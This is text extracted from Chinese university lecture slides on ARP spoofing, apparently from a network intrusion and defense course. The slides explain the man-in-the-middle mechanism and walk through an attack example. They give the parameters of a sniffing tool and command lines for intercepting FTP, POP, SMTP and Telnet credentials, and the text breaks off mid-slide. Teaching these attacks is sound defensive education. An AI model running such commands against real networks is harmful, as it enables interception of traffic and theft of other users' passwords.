2.8网络欺骗攻击-华东理工大学计算机科学与工程系.ppt

ARP欺骗原理—原理图 * 网络入侵与防范讲义 * * 网络入侵与防范讲义 * ARP欺骗原理—欺骗过程 主机B()向网关C发送ARP应答包说：我是，我的MAC地址是03-03-03-03-03-03，主机B同时向主机A发送ARP应答包说：我是，我的MAC地址是03-03-03-03-03-03。 这样，A发给C的数据就会被发送到B，同时获得C发给A的数据也会被发送到B。 这样，B就成了A与C之间的“中间人”。 * 网络入侵与防范讲义 * ARP欺骗攻击的危害 ARP欺骗攻击在局域网内非常奏效，其危害有： 致使同网段的其他用户无法正常上网（频繁断网或者网速慢）。 使用ARP欺骗可以嗅探到交换式局域网内所有数据包，从而得到敏感信息。 ARP欺骗攻击可以对信息进行篡改，例如，可以在你访问的所有网页中加入广告。 利用ARP欺骗攻击可以控制局域网内任何主机，起到“网管”的作用，例如，让某台主机不能上网。 * 网络入侵与防范讲义 * 5.3.3 ARP欺骗攻击实例 使用工具：Arp cheat and sniffer V2.1 国内开源软件，它是一款arp sniffer工具，可以通过arp欺骗嗅探目标主机TCP、UDP和ICMP协议数据包。 攻击环境：在一个交换式局域网内 受害者IP为3，MAC为00-0D-60-36-BD-05； 网关IP为54，MAC为00-09-44-44-77-8A； 攻击者IP为8，MAC为00-07-E9-7D-73-E5。 攻击目的：攻击者想得知受害者经常登陆的FTP用户名和密码。 * 网络入侵与防范讲义 * ARP攻击实例--工具参数介绍 -si 源ip -di 目的ip *代表所有,多项用,号分割 -sp 源端口 -dp 目的端口 *代表所有 -w 嗅探方式，1代表单向嗅探[si-di]，0代表双向嗅探 [si-di] -p 嗅探协议[TCP,UDP,ICMP]大写 -m 最大记录文件，以M为单位 -o 文件输出 -hex 十六进制输出到文件 -unecho 不回显 -unfilter 不过虑0字节数据包 -low 粗略嗅探，丢包率高，cpu利用率低 基本0 -timeout 嗅探超时,除非网络状况比较差否则请不要调高,默认为 120秒 * 网络入侵与防范讲义 * ARP攻击实例--工具参数介绍（2） -sniffsmtp 嗅探smtp -sniffpop 嗅探pop -sniffpost 嗅探post -sniffftp 嗅探ftp -snifftelnet 嗅探telnet，以上5个嗅探不受参数si,sp,di,dp,w,p影响. -sniffpacket 规则嗅探数据包,受参数si,sp,di,dp,w,p影响 -sniffall 开启所有嗅探 -onlycheat 只欺骗 -cheatsniff 欺骗并且嗅探 -reset 欺骗后恢复 -g [网关ip] -c [欺骗者ip] [mac] -t [受骗者ip] -time [欺骗次数] * 网络入侵与防范讲义 * ARP攻击实例--工具参数介绍（3） 使用举例： arpsf -p TCP -dp 25,110 -o f:\1.txt -m 1 –sniffpacket 说明：嗅探指定规则数据包并保存到文件 arpsf -sniffall -cheatsniff -t -g 54 说明：欺骗并且嗅探与外界的通讯，输出到屏幕 arpsf -onlycheat -t -c 002211445544 -time 100 –reset 说明：对目标欺骗一百次，欺骗后恢复 arpsf -cheatsniff -t 4 -g 54 -sniffpacket -p TCP -dp 80,25,23,110 -o d:\siff.txt -w 0 -m 1 说明：嗅探4与外网的tcp连接情况并指定目的端口是80，23，25，110，嗅探方式是双向嗅探，最大记录文件是1M，输出到d盘sniff.txt文件中。其中54是网关的地址。也可以改成同网段中其他的地址，那就是网内嗅探了。 * 网络入侵与防范讲义 * ARP攻击实例--攻击过程 在Windows XP下通过命令行启动软件，运行命令：arpsf -cheatsniff -t 3 -g 54 -sniffpacket -p TCP -dp 21 -o c:\siff.txt -w 0 -m 1。 含义是：嗅探3与其它主机的tcp连接情况并指定目的端口是21，嗅探方式是双向嗅探，最大记录文件是1M，结果输出到C盘sniff.txt。其中54是网关的地址。 运行效果见下页图。 * 网络入侵与防范讲义 * 输入命令 输出版本信息 选择获取网